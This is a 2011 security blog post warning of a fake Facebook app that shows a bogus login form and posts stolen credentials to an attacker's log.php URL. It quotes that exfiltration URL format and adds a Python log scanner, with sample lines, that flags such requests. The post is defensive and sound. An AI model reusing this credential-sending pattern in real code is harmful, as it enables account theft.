Another Fake Facebook App is Here to Steal your Passwords

21 Apr
Hi Fellas,

Recently, there has been an application that displays the message “Tornado Randomly Appears During Soccer Game” on Facebook.

Clicking on the message forces the download of a script from http://<IP Removed>/fb2.js, which displays a Facebook login message. If the user is logged in to Facebook, the malicious app will log the user out and ask him/her to log in again.

When the user clicks on the “Login” button, it will show the login form.

When the user enters login details and clicks on the Login button, the fake application sends two POST requests: one to, and the other to the malicious server. The request sent to the malicious server has the following format:

http://IPRemoved/log.php?email=<email address>&pass=<password>

The standard advice is to check the browser's address bar to determine where a page comes from, but that isn't enough in this case. The address bar will show when the login form is displayed, even though the credentials are posted to a malicious site instead.

The bogus app also “likes” the link in an automatic post, which is displayed on the user’s profile.

A similar attack was also observed to be hosted on the same IP address. It displays a different message: “Video: This is the best April Fools’ prank ever!” This attack employs the same technique described above to steal the usernames and passwords of users’ Facebook accounts.
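Because both variants exfiltrate the credentials in a plain query string to a bare-IP host, the pattern is easy to pick out of web-proxy logs. The following detector is an added example, not code from the post: it assumes a simplified "timestamp client method url" log format, uses constructed sample lines, and uses the documentation address 203.0.113.10 as a placeholder for the removed IP.

```python
"""Flag web-proxy log entries that carry credentials in the URL query string."""
from ipaddress import ip_address
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Parameter names that typically carry a secret or an identity (assumption: tune per environment).
SECRET_PARAMS = {"pass", "password", "passwd", "pwd"}
IDENTITY_PARAMS = {"email", "user", "username", "login"}

# Constructed sample log (not from the post); line 1 mirrors the log.php?email=...&pass=... pattern
# described above, with 203.0.113.10 standing in for the removed IP address.
SAMPLE_LOG = """\
2011-04-21T10:02:11Z 10.0.0.5 GET http://203.0.113.10/log.php?email=alice%40example.com&pass=hunter2
2011-04-21T10:02:12Z 10.0.0.5 POST https://www.facebook.com/login.php
2011-04-21T10:03:40Z 10.0.0.7 GET http://203.0.113.10/fb2.js
2011-04-21T10:04:02Z 10.0.0.9 GET https://www.example.com/search?q=tornado+soccer
"""


def is_bare_ip(host: str) -> bool:
    """True when the host part of the URL is a literal IP rather than a hostname."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def analyse(line: str) -> Optional[dict]:
    """Return a finding for a log line whose query string names a secret parameter, else None."""
    parts = line.split()
    if len(parts) != 4:
        return None  # malformed or unexpected format; ignore
    timestamp, client, _method, url = parts
    u = urlsplit(url)
    params = {k.lower() for k in parse_qs(u.query, keep_blank_values=True)}
    secret = params & SECRET_PARAMS
    if not secret:
        return None
    return {
        "timestamp": timestamp,
        "client": client,
        "host": u.hostname,
        "secret_params": sorted(secret),
        "identity_params": sorted(params & IDENTITY_PARAMS),
        "bare_ip_host": is_bare_ip(u.hostname or ""),  # raw IP hosts are a strong phishing signal
        "plaintext": u.scheme == "http",                # credentials also travelled unencrypted
    }


def scan(log_text: str) -> list:
    """Run analyse() over every line and keep only the findings."""
    return [hit for hit in (analyse(line) for line in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```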
NB: Henceforth, alerts will no longer be sent by SMS; they will be sent to your email instead. Thanks for being careful even as you play in the wild (Internet).
~Good luck~


Posted by on April 21, 2011 in Information Security